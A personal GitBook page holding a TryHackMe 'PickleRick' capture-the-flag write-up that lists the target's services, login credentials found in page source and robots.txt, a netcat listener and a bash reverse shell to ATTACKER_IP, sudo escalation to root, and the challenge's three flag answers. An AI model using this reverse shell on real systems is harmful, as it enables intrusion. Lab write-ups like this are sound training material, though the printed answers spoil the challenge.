🎯
dmdhrumilmistry's gitbook
  • dmdhrumilmistry's gitbook
  • Blog
    • TryHackMe WriteUps
      • PickleRick
      • StartUp
      • Basic Malware RE
      • Bounty Hacker
      • Lazy Admin
      • Crack The Hash
      • Cyborg
      • OverPass
      • OverPass2
      • Agent T
      • Vulnerable API App
      • Git-Happens
      • Kiba
    • Vulnerabilities in Wild
      • Hiring Platform Exposing Thousands of User's Data
      • Security Analysis of the Indian Government's Student Assessment Platform
      • Exploiting S3 bucket misconfiguration to dump users emails
      • Getting Shell Access to ADB Exposed Smart Devices πŸ“²πŸ“ΊβŒš
      • Hacking Mumbai's Metro ChatBot and APIs for FUN πŸ€ΈπŸ»β€β™‚οΈ
      • Random Object Referencing IDs Still Aren't Safe in APIs πŸ’₯
      • Exploring Weird Account TakeOver (ATO) Vulnerabilities in APIs
    • Secure Software Development
      • Validating File Content Types to avoid Malicious File Hosting using ML Model
      • Securing Containers Supply Chain using Secure Base Layer Image
      • Automated API Tests in SDLC are Boon
Powered by GitBook
On this page
  • Services
  • Web APP URLs
  • Login Panel
  • First Ingredient
  • Second Ingredient
  • Third Ingredient

Was this helpful?

  1. Blog
  2. TryHackMe WriteUps

PickleRick

Services

  • HTTP (Apache/2.4.18)

  • SSH (OpenSSH 7.2p2)

Web APP URLs

  • /login.php

  • /robots.txt

Login Panel

username: R1ckRul3s (from page source of homepage) password: Wubbalubbadubdub (from robots.txt)

First Ingredient

  • Login to /login.php using above credentials

  • start listener on attacker's machine using

    nc -nlvp ATTACKER_PORT

  • create bash reverse shell (since, cat is disabled) using bash -c 'exec bash -i &>/dev/tcp/ATTACKER_IP/ATTACKER_PORT <&1'

  • read secret file

    cat Sup3rS3cretPickl3Ingred.txt

    mr. meeseek hair

Second Ingredient

  • using command shell read second ingredient file

    cat "/home/rick/second ingredients"

    1 jerry tear

Third Ingredient

  • change user to ubuntu then root

    sudo su ubuntu
sudo su root

  • Read third file

    cat /root/3rd.txt

    fleeb juice

PreviousTryHackMe WriteUpsNextStartUp

Last updated 2 years ago

Was this helpful?